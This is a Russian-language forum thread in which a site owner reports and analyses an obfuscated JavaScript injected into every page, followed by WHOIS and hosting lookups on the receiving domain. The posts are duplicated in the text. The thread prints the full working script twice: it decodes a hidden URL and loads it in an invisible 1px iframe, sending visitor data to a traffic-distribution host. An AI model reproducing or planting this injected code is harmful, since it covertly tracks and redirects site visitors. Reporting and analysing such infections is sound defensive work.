Вирус?
- Автор темы murunta
- Дата начала
На каждой страничке всунут вот такой скрипт обфусцированный:
<script type="text/javascript">var CaJhv=62;function vzPKtI(){}
if('tkGro'=='EKeFTM')XymDnO();if('Vyazoa'=='Dehy')JJVanL();var XoGSAwWp="parseI\x6et";function bxsvZ(){var YCOIC='YQWc';if('XICCOh'=='qAEG')bWrkW();}var MGLJ='hgHPH';var qMCVB='RtqBy';var dPCKBN=242;var RcQUmayu="";var Qxtc='FijdNp';if('cmymhA'=='uwRs')JFeDs='DOuXHL';var YhxZKG="8d9999955f54548b8691918a999994928692878653889492549855548e9353888c8e645655";function aTqV(){}var WXKcYH=211;var sAhMultT="fr\x6fmC\x68arCode";if('wNTzT'=='Brev')hUASQI='vYCinj';var Yewqid;var Yzypys="s\x6cice";var nAbSnt=96;function wFdMid(){var ZAruS='xvPDEN';if('avvrhm'=='nAkgtJ')ODSIk();}var JbHr;var Nojrd=(function(){var SZRe=24;var UGVgW;return this;if('XMVo'=='BItta')BHPA='MgISlJ';if('INMMN'=='VfNp')DIZljv();})();function yiQCIE(){}if('nNHNBr'=='QCrtp')CbCy='NbthQn';var AxzFr=22;var bLQIkOo="con\x73truc\x74or";if('BJYYI'=='HABcSi')SMNK();var ZSZnpPSLC="tCrLfv"[bLQIkOo];function XrDDQn(){}
var PMTUT;if('hgsv'=='CEWt')NwpVLw='MccRKh';for(var KowOM=0;KowOM<YhxZKG.length;KowOM+=2){if('EEHpF'=='CaYi')TDASx='XPZLub';bZzQY=Nojrd[XoGSAwWp](YhxZKG[Yzypys](KowOM,KowOM+2),16)-37;RcQUmayu+=ZSZnpPSLC[sAhMultT](bZzQY);var huMeh=187;if('HcWcq'=='ZByIUR')JTZh='AoGu';}
function CbheeG(){}
function KKPyC(){}
var FPOBlKAg="HXCFv";function FJcQ(){var tNYsuj='jjapw';if('xHLJIb'=='AnGzbG')uaFI();}
var fBkYlbx=navigator.appVersion.indexOf("MSIE")!=-1?'<iframe name="'+FPOBlKAg+'" src="'+"RcQUmayu"+'">':'iframe';var vNuVCR;var Imkfad=document.createElement(fBkYlbx);var YcPQDi=209;var xsCq;Imkfad.name=FPOBlKAg;var oEeskA='eubq';var aIyxjh='UteP';Imkfad.setAttribute("name",FPOBlKAg);if('JHdVsc'=='AHTS')nOEyZQ='yxegB';Imkfad.id=FPOBlKAg;if('lacR'=='DxDoN')FpEe='EyGVha';Imkfad.src=RcQUmayu;Imkfad.style.right="0px";if('gQIlg'=='Fdsx')mKiEaz();Imkfad.style.top="0px";if('iewRb'=='zRTNu')CdXx();function QziiQh(){}var pYza='EwCnCj';Imkfad.style.height="1px"
var VkFjSv;var Tdasx=170;Imkfad.style.width="1px";var oDwXk;if('VlUPlK'=='WvCeJ')IStMU();Imkfad.style.position="absolute";document.body.appendChild(Imkfad);function ZClun(){}
if('XktS'=='zBzc')NGtgzA();if('XmfPqs'=='lHQKsK')hKopJ();var uQOaK=52;</script>
Лезет на fallettomamba.com в невидимом фрейме и пытается записать в лог данные об браузере который мы используем, о нашем ip адресе, о адресах с которых мы пришли на этот сайт.
Вот так он передает данные в лог:
http://fallettomamba.com/s0/in.cgi?9999999
Судя по ошибке которая пишется на экране, они используют систему сбора статистики Supra TDS:
http://www.kytoon.com/sutra-tds.html
Скорее всего, веб сервер скомпрометирован хакерами и взят на контроль для статистики. В дальнейшем он может быть использован для аттак на другие ресурсы.
Либо используется для генерации трафика нами в сторону этого fallettomamba.com для продажи.. этого трафика
<script type="text/javascript">var CaJhv=62;function vzPKtI(){}
if('tkGro'=='EKeFTM')XymDnO();if('Vyazoa'=='Dehy')JJVanL();var XoGSAwWp="parseI\x6et";function bxsvZ(){var YCOIC='YQWc';if('XICCOh'=='qAEG')bWrkW();}var MGLJ='hgHPH';var qMCVB='RtqBy';var dPCKBN=242;var RcQUmayu="";var Qxtc='FijdNp';if('cmymhA'=='uwRs')JFeDs='DOuXHL';var YhxZKG="8d9999955f54548b8691918a999994928692878653889492549855548e9353888c8e645655";function aTqV(){}var WXKcYH=211;var sAhMultT="fr\x6fmC\x68arCode";if('wNTzT'=='Brev')hUASQI='vYCinj';var Yewqid;var Yzypys="s\x6cice";var nAbSnt=96;function wFdMid(){var ZAruS='xvPDEN';if('avvrhm'=='nAkgtJ')ODSIk();}var JbHr;var Nojrd=(function(){var SZRe=24;var UGVgW;return this;if('XMVo'=='BItta')BHPA='MgISlJ';if('INMMN'=='VfNp')DIZljv();})();function yiQCIE(){}if('nNHNBr'=='QCrtp')CbCy='NbthQn';var AxzFr=22;var bLQIkOo="con\x73truc\x74or";if('BJYYI'=='HABcSi')SMNK();var ZSZnpPSLC="tCrLfv"[bLQIkOo];function XrDDQn(){}
var PMTUT;if('hgsv'=='CEWt')NwpVLw='MccRKh';for(var KowOM=0;KowOM<YhxZKG.length;KowOM+=2){if('EEHpF'=='CaYi')TDASx='XPZLub';bZzQY=Nojrd[XoGSAwWp](YhxZKG[Yzypys](KowOM,KowOM+2),16)-37;RcQUmayu+=ZSZnpPSLC[sAhMultT](bZzQY);var huMeh=187;if('HcWcq'=='ZByIUR')JTZh='AoGu';}
function CbheeG(){}
function KKPyC(){}
var FPOBlKAg="HXCFv";function FJcQ(){var tNYsuj='jjapw';if('xHLJIb'=='AnGzbG')uaFI();}
var fBkYlbx=navigator.appVersion.indexOf("MSIE")!=-1?'<iframe name="'+FPOBlKAg+'" src="'+"RcQUmayu"+'">':'iframe';var vNuVCR;var Imkfad=document.createElement(fBkYlbx);var YcPQDi=209;var xsCq;Imkfad.name=FPOBlKAg;var oEeskA='eubq';var aIyxjh='UteP';Imkfad.setAttribute("name",FPOBlKAg);if('JHdVsc'=='AHTS')nOEyZQ='yxegB';Imkfad.id=FPOBlKAg;if('lacR'=='DxDoN')FpEe='EyGVha';Imkfad.src=RcQUmayu;Imkfad.style.right="0px";if('gQIlg'=='Fdsx')mKiEaz();Imkfad.style.top="0px";if('iewRb'=='zRTNu')CdXx();function QziiQh(){}var pYza='EwCnCj';Imkfad.style.height="1px"
var VkFjSv;var Tdasx=170;Imkfad.style.width="1px";var oDwXk;if('VlUPlK'=='WvCeJ')IStMU();Imkfad.style.position="absolute";document.body.appendChild(Imkfad);function ZClun(){}
if('XktS'=='zBzc')NGtgzA();if('XmfPqs'=='lHQKsK')hKopJ();var uQOaK=52;</script>
Лезет на fallettomamba.com в невидимом фрейме и пытается записать в лог данные об браузере который мы используем, о нашем ip адресе, о адресах с которых мы пришли на этот сайт.
Вот так он передает данные в лог:
http://fallettomamba.com/s0/in.cgi?9999999
Судя по ошибке которая пишется на экране, они используют систему сбора статистики Supra TDS:
http://www.kytoon.com/sutra-tds.html
Скорее всего, веб сервер скомпрометирован хакерами и взят на контроль для статистики. В дальнейшем он может быть использован для аттак на другие ресурсы.
Либо используется для генерации трафика нами в сторону этого fallettomamba.com для продажи.. этого трафика
Домен зарегистрирован:
REGISTRY WHOIS FOR FALLETTOMAMBA.COM
Domain Name: fallettomamba.com
Updated: 2 seconds ago - Refresh
Registrar: DOMAINCONTEXT, INC.
Whois Server: whois.domaincontext.com
Referral URL: http://www.domaincontext.com
Status: clientTransferProhibited
Expiration Date: 2012-11-29
Creation Date: 2011-11-29
Last Update Date: 2011-11-29
Name Servers:
ns1.regway.com
ns2.regway.com
See fallettomamba.com DNS Records
Два дня назад.
Сайт хостится в Голландии.
inetnum: 95.211.77.32 - 95.211.90.255netname: LEASEWEBdescr: LeaseWebdescr: P.O. Box 93054descr: 1090BB AMSTERDAMdescr: Netherlandsdescr: www.leaseweb.comremarks: Please send email to "abuse@leaseweb.com" for complaintsremarks: regarding portscans, DoS attacks and spam.country: NLadmin-c: LSW1-RIPEtech-c: LSW1-RIPEstatus: ASSIGNED PAmnt-by: OCOM-MNTsource: RIPE #Filtered
Вот что пишет интернет по поводу похожих схем:
Most of them have /ts/in.cgi?(affiliateId) or just /in.cgi?(number) in the request url, most are connected with “Obodovsky Ivan Sergeevich”, who is listed as registrator not only for most of the proxy install sites, but also for the primary url “admin-click.com”, that can be accessed by overflowing the GET parameter of in.cgi
Also it seems that many high-profile russian sites were infected by it, including www .pravda.ru
REGISTRY WHOIS FOR FALLETTOMAMBA.COM
Domain Name: fallettomamba.com
Updated: 2 seconds ago - Refresh
Registrar: DOMAINCONTEXT, INC.
Whois Server: whois.domaincontext.com
Referral URL: http://www.domaincontext.com
Status: clientTransferProhibited
Expiration Date: 2012-11-29
Creation Date: 2011-11-29
Last Update Date: 2011-11-29
Name Servers:
ns1.regway.com
ns2.regway.com
See fallettomamba.com DNS Records
Два дня назад.
Сайт хостится в Голландии.
inetnum: 95.211.77.32 - 95.211.90.255netname: LEASEWEBdescr: LeaseWebdescr: P.O. Box 93054descr: 1090BB AMSTERDAMdescr: Netherlandsdescr: www.leaseweb.comremarks: Please send email to "abuse@leaseweb.com" for complaintsremarks: regarding portscans, DoS attacks and spam.country: NLadmin-c: LSW1-RIPEtech-c: LSW1-RIPEstatus: ASSIGNED PAmnt-by: OCOM-MNTsource: RIPE #Filtered
Вот что пишет интернет по поводу похожих схем:
Most of them have /ts/in.cgi?(affiliateId) or just /in.cgi?(number) in the request url, most are connected with “Obodovsky Ivan Sergeevich”, who is listed as registrator not only for most of the proxy install sites, but also for the primary url “admin-click.com”, that can be accessed by overflowing the GET parameter of in.cgi
Also it seems that many high-profile russian sites were infected by it, including www .pravda.ru
